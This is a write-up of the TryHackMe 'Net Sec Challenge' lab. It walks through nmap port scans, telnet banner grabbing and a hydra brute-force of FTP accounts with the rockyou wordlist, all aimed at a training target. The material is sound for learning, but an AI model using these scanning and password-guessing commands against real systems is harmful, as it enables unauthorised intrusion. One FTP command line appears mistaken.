TryHackMe: Net Sec Challenge
This is a write up for the THM Net Sec Challenge — https://tryhackme.com/room/netsecchallenge
We already have a number of write-ups but I thought I’d attempt to give a little more explanation on my approach, since there are many ways of skinning a cat.
What is the highest port number being open less than 10,000?
nmap nmap -sS -T4 -p1000-9999 TARGET
Since there was a hint for 4-digit port, best approach will be to limit the scans to run from 1000 (least possible) to 9999 (highest possible).
Then I use stealth-scan (
-sS) which does not do the 3-way handshake hence faster.
-T4 option is an aggressive approach of probing with very little pausing time.
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
Same idea as the previous one:
The scan will take long, you don’t have to wait, as that runs, fire up a new terminal and move to the next one.
nmap -sS -T4 -p10000-65535 TARGET
How many TCP ports are open?
Another one that will take some time, run this as you head to the next one.
nmap -sS -T4 -p- TARGET
What is the flag hidden in the HTTP server header?
There are many ways you can tackle this, but the simplest way would be using telnet:
telnet IP 80
GET / HTTP/1.1
What is the flag hidden in the SSH server header?
Telnet will do the trick:
telnet IP 22
We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
From your list of open ports, there’s one port that is nonstandard (unknown):
nmap -sS -sV -p<port> 10.10.222.215
We learned two usernames using social engineering: eddie and
quinn. What is the flag hidden in one of these two account files and accessible via FTP?
Since we have the FTP port from the previous question, we can use this with hydra:
hydra -l <user-name> -P /usr/share/wordlists/rockyou.txt ftp://10.10.222.215:<port>
Now that we have the password, we can ftp into the server and catch the flag:
ftp> get <IP> <port>
ftp> get <flag_file>
http://IP:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
nmap -sN -v TARGET